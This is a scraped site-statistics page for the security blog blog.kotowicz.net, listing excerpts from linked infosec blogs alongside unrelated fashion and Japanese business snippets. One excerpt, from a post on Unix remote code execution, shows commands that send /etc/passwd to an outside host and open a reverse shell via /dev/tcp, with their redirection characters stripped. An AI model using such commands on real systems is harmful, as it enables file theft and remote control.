blog.kotowicz.net
the world. according to kotoA blog on security, malware, cryptography, pentesting, javascript, php and whatnots
http://blog.kotowicz.net/
A blog on security, malware, cryptography, pentesting, javascript, php and whatnots
http://blog.kotowicz.net/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Wednesday
LOAD TIME
3.1 seconds
PAGES IN
THIS WEBSITE
21
SSL
EXTERNAL LINKS
111
SITE IP
172.217.6.83
LOAD TIME
3.085 sec
SCORE
6.2
the world. according to koto | blog.kotowicz.net Reviews
https://blog.kotowicz.net
A blog on security, malware, cryptography, pentesting, javascript, php and whatnots
blog.kotowicz.net
September 2013
http://blog.kotowicz.net/2013_09_01_archive.html
The world. according to koto. On security, malware, cryptography, pentesting, javascript, php and whatnots. Monday, September 23, 2013. Exploiting EasyXDM part 1: Not the usual Flash XSS. Upgrade NOW. Otherwise - read up on exploiting difficult Flash vulnerabilities in practice. Secure cross-domain communication is hard enough, but its a piece of cake compared to making it work in legacy browsers. One popular library that tries to handle all the quirks and even builds an RPC framework is easyXDM.
October 2013
http://blog.kotowicz.net/2013_10_01_archive.html
The world. according to koto. On security, malware, cryptography, pentesting, javascript, php and whatnots. Tuesday, October 15, 2013. Exploiting EasyXDM part 2: and considered harmful. URL parsing is hard, always encode stuff and Safari has some interesting properties. This is a second post describing easyXDM vulnerabilities. Reading the first part might come in handy:. Exploiting EasyXDM part 1: Not the usual Flash XSS. Version, and are patched in 2.4.18. They are tracked with a single CVE-2013-5212.
When you don't have 0days. Client-side exploitation for the masses
http://blog.kotowicz.net/2014/03/when-you-dont-have-0days-client-side.html
The world. according to koto. On security, malware, cryptography, pentesting, javascript, php and whatnots. Saturday, March 22, 2014. When you don't have 0days. Client-side exploitation for the masses. Yesterday me and @antisnatchor. Gave a talk at Insomni'hack. Entitled "When you don't have 0days. Client-side exploitation for the masses". We described different tricks that one can use during a pentesting assignment to achieve goals without burning any of those precious 0days. Ported recently to BeEF.
November 2012
http://blog.kotowicz.net/2012_11_01_archive.html
The world. according to koto. On security, malware, cryptography, pentesting, javascript, php and whatnots. Friday, November 9, 2012. Keys to a kingdom - can you crack a JS crypto? I've posted a small, quick challenge for all of you to try. It's got it all - HTML5, crypto, client-side Javascript, fast action, neat dialogues and a beautiful princess. So, without further ado, I present to you:. Keys to a kingdom! Links to this post. Subscribe to: Posts (Atom). My "Hacking HTML5" training.
December 2013
http://blog.kotowicz.net/2013_12_01_archive.html
The world. according to koto. On security, malware, cryptography, pentesting, javascript, php and whatnots. Friday, December 27, 2013. Rapportive XSSes Gmail or have yourself a merry little botnet. 160;Learn how to code audit Handlebars applications. Xss in extension = fun times. Mosquito gets new features. Its that magical time of the year, when wonders happen. Everyones getting big presents. I was apparently naughty, cause I only got one XSS. What can one do? If life gives you lemons. But XSS on Gmail?
TOTAL PAGES IN THIS WEBSITE
21
ZoczuS Blog: [PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015
http://zoczus.blogspot.com/2015/04/pl-bypassing-same-origin-policy-slajdy.html
Środa, 22 kwietnia 2015. PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015. W poniedziałek 20.04.2015r. miałem przyjemność bycia prelegentem na konferencji 4Developers. W ścieżce Security organizowanej przez SecuRing. Slajdy z prezentacji: https:/ drive.google.com/file/d/0B7U6Q1zbqTkyOEY3TmRXWl8tODQ/view? Nagranie będzie dostępne w przyszłości. :). Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. Udostępnij w serwisie Pinterest. Subskrybuj: Komentarze do posta (Atom).
ZoczuS Blog: CSAW CTF Web300 writeup
http://zoczus.blogspot.com/2014/09/csaw-ctf-web300-writeup.html
Niedziela, 21 września 2014. CSAW CTF Web300 writeup. In this post I want to show my solution for CSAW CTF. Web300. This is the service, where we are able to post some links, that are parsed by bot, and looks like this:. There are two important things about this task. First of all, we can notice that page using jquery 1.6.1 (which prone to XSS - CVE-2011-4969. And serving this kind of code:. Pretty simple. doesn't it? Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. CSAW CTF Web300 writeup.
ZoczuS Blog: kwietnia 2013
http://zoczus.blogspot.com/2013_04_01_archive.html
Środa, 10 kwietnia 2013. EN] DNS missing allow-transfer. Ten Post wyjątkowo będzie napisany w języku angielskim. Z góry przepraszam. :-). Before we start pentesting it's always good to gather some information about our target. One thing which we'd like to know are additional resources - SQL servers, developers and test machines, backups, etc. For example, we can check PTR records (revDNS) for IP class (manually or using this tool. Sometimes, our target configures his zone without allow-transfer. Awk -F: ...
Abraham Aranguren's blog: January 2014
http://blog.7-a.org/2014_01_01_archive.html
Infosec blog about anything security-related I get my hands on :). Monday, 13 January 2014. OWTF 0.45.0 "Winter Blizzard" released! OWASP OWTF is always looking for contributors, feedback and new ideas. If you find a bug or have an idea about what OWTF could do, please tell us in our github issue tracker. This is another a very significant release which includes the continued outstanding work of:. The 4 x OWASP OWTF GSoC 2013 projects -including post-GSoC improvements- (Sponsored by Google. WARNING: This...
Abraham Aranguren's blog: August 2013
http://blog.7-a.org/2013_08_01_archive.html
Infosec blog about anything security-related I get my hands on :). Sunday, 25 August 2013. AppSec EU: OWASP OWTF Summer Storm slides, demos and Plug-n-Hack support! UPDATE 04/09/2013: Added link to AppSec EU video. UPDATE 26/08/2013: Added Plug-n-Hack support link. OWASP AppSec EU 2013. Were both a blast this week:. I would like to use this opportunity to let you know that:. Is always actively looking for contributors. Bug reports / ideas. OWASP OWTF supports the Plug-n-Hack mozilla standard now. This is...
Ge0's english blog: Standing the recursive traversal algorithms: towards a software architecture
http://ge0-it.blogspot.com/2013/09/standing-recursive-traversal-algorithms.html
This blog mainly deals with software engineering, reverse engineering and other such fancy topics. Friday, September 6, 2013. Standing the recursive traversal algorithms: towards a software architecture. Update 07/09/2013: there is now a github repo for the experimentation: https:/ github.com/Ge0/RecursiveTraversalx86. And I'll try to fill it as much as I can. If you want to get involved in, feel free to drop a comment or shoot me an email. Thx! Disassembling other instruction sets;. But let's not fall i...
browser-shredders.blogspot.com
Browser Shredders: June 2014
http://browser-shredders.blogspot.com/2014_06_01_archive.html
Saturday, June 21, 2014. Browser Shredders Challenge #1. For some time now I haven't succeeded in triggering password autofill in any iOS browser from a downloaded HTML file (which would allow another easy way to steal passwords). There are no Same Origin Policy constraints for local HTML files, so it seems easy to just open the target website and read the password, but there are some problems:. Password autofill does not work in cross-domain frames in iOS browsers based on UIWebView. 1 Load as plain text.
ZoczuS Blog: lutego 2015
http://zoczus.blogspot.com/2015_02_01_archive.html
Wtorek, 3 lutego 2015. Evercookie.swf - Stored Cross-Site Scripting. Released new version of evercookie. That fixes Stored Cross-Site Scripting issue that I reported. Here is how it works in details. First of all - we should check vulnerable code: evercookie.as. So - the flash file takes flashVar parameter everdata. And puts it to SharedObject. Something like Local Storege but for Flash). If some data already was in SharedObject - it pass its value to javascript function called evercookie flash var().
ZoczuS Blog: października 2013
http://zoczus.blogspot.com/2013_10_01_archive.html
Czwartek, 10 października 2013. EN] Unix RCE without spaces. You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output. Zoczus@hell: $ cat /etc/debian version 7.1. Can't see the output? Send it through Internet! Zoczus@hell: $ cat /etc/passwd /dev/tcp/xxxx.pl/5060. It looks all right ;) You can also create reverse shell:. Sh /dev/tcp/ xxxx.pl/5060.
browser-shredders.blogspot.com
Browser Shredders: Exploring and Exploiting iOS Web Browsers - local HTML files
http://browser-shredders.blogspot.com/2014/06/exploring-and-exploiting-ios-web_21.html
Saturday, June 21, 2014. Exploring and Exploiting iOS Web Browsers - local HTML files. A quick summary of the possible methods for preventing UXSS when loading untrusted local HTML files into iOS UIWebView:. 1 Load as plain text. This would probably break the planned functionality of the application, but you can always decide to use loadData method with mimeType text/plain and forget about all the HTML problems. The only application implementing similar solution that I know of is currently Onion Browser.
TOTAL LINKS TO THIS WEBSITE
111
Blog
65288;当社の場合、固定電話を使用していなかったため、NTTの固定電話・FAXを解約してしまいました。大急ぎでひかり電話を契約しなおして、新しい電話番号を取得しました。). ハガキ 認め印 前回の免許証 申請書の副本を持って新しい免許証を貰いに行く.
Blog |
Kotoro's Blog
Science, Rants, Fan-Fiction, Weirdness, and Ramblings. June 28th, 2012. I don’t really agree with Justice Roberts’ opinion that you can fairly read the fees associated with NOT having health insurance as a tax. What other tax on the books is applied based on the fact that a person is NOT purchasing a service? Sales tax is tax on a transaction of money, this is tax on a person because they are NOT purchasing something.). Posted in Political, Legal, and Social Commentary. MAC VS PC is very misleading!
名古屋大須シルバーアクセサリー・動物・ベビースプーン"KOTORODROP News"シルバーアクセサリーアトリエSHOP.
201505.08 Friday 14:12. 側面に 名前 誕生日 を刻印いたします。 シルバーアクセサリー,真鍮アクセサリー,ベビースプーン,動物" KOTORODROP". 201505.05 Tuesday 20:21. 営業時間11 30 20 00. シルバーアクセサリー,真鍮アクセサリー,ベビースプーン,動物" KOTORODROP". 201505.05 Tuesday 20:04. シルバーアクセサリー,真鍮アクセサリー,ベビースプーン,動物" KOTORODROP". 201504.29 Wednesday 11:54. シルバーアクセサリー,真鍮アクセサリー,ベビースプーン,動物" KOTORODROP". 201504.23 Thursday 15:23. シルバーアクセサリー,真鍮アクセサリー,ベビースプーン,動物" KOTORODROP". 1/161ページ 次のページ ».
the world. according to koto
The world. according to koto. On security, malware, cryptography, pentesting, javascript, php and whatnots. Tuesday, June 28, 2016. Reflections on trusting CSP. Tldr; new changes in CSP sweep a huge number of the vulns, yet they enable new bypasses. Internet lives on, ignoring CSP. Let’s talk about CSP. Content Security Policy (CSP) - a tool which developers can use to lock down their applications in various ways, mitigating the risk of content injection vulnerabilities such as cross-site scripting.
KOTTON – der Shirtblog & Siebdruckblog aus Berlin.
Montag, 6. Januar 2014. Büroplatz an der Spree frei. Der Titel sagt es bereits: Wir suchen einen freien Grafiker aus Berlin, der einen günstigen Arbeitsplatz in einem hellen, etwas anderen Office zusammen mit zwei Fotografen, einem Grafiker und einem Band-Booker teilen möchte. Riesen-Terrasse mit Spreeblick und Grill vorhanden! Bitte melde dich schnell unter ms@kukukk.net – frei ab sofort! Eingestellt von KOTTON designshirts. Donnerstag, 5. Dezember 2013. Ausgenommen sind die Kooperationsshirts). Ein sch...
KottonZoo
December 14, 2015. The Zoo's Top 10 Party Schools. December 11, 2015. Life In Color: Go Hard in The Paint. November 24, 2015. 10 Quotes from Prince Ea That Will Change Your Perspective on Life. November 18, 2015. These 15 Pieces of TPindell Merch Are Your Bae. November 11, 2015. The 10 Funniest YouTube Stars You've Never Heard Of. The Zoos Top 10 Party Schools. These 15 Pieces of TPindell Merch Are Your Bae. November 10, 2015. 10 Epic Shirts To Live Your Life In Color. November 08, 2015. November 05, 2015.
お知らせ・ブログ - 骨盤矯正ねっと!
2015年4月24日 13:50 シーエムケー. 2015年4月22日 13:33 シーエムケー. 2015年4月21日 13:15 シーエムケー.
Mode Blog: aktuelle Trends, Fashion-Tipps und Styles
Gepostet von admin in Mode Trends und Musthaves. Umfrage: Mode Herbst/Winter 2011/2012. Was kommt, was bleibt? Gepostet von admin in Mode Trends und Musthaves. Tipps & Trends: Mode Herbst/Winter 2011/2012. Gepostet von admin in Mode Trends und Musthaves. Umrage: Welche Schuhe und Taschen möchtest Du noch kaufen? Gepostet von admin in Allgemeines. Umfrage: Warum lieben Frauen Schuhe so sehr? Gepostet von admin in Mode Trends und Musthaves. Tipps & Trends: Perfektes Party Outfit 2011. Seite 1 of 26.
Kotyr | Bloggen
Detta är nog en av de snyggaste. Kombinationerna som vi har sett! Rockar verkligen Satoko kjolen. Från Baum und Pferdgarten. Bli lika sommarfin som Engla i din alldeles egna kjol och tröja, speciellt nu när vi har en GRYM. På hela sortimentet (gäller ej på Ida Sjöstedt). Börja shoppingen genom att klicka på länkarna eller här! Detta inlägg postades i Baum und Pferdgarten. 22 maj, 2015. Stina Rodebjer Samsoe & Samsoe. Coolare än någonsin i vår vändbara Vive Zig Zag coat. Och våra pampiga Chavez espadrillos.
SOCIAL ENGAGEMENT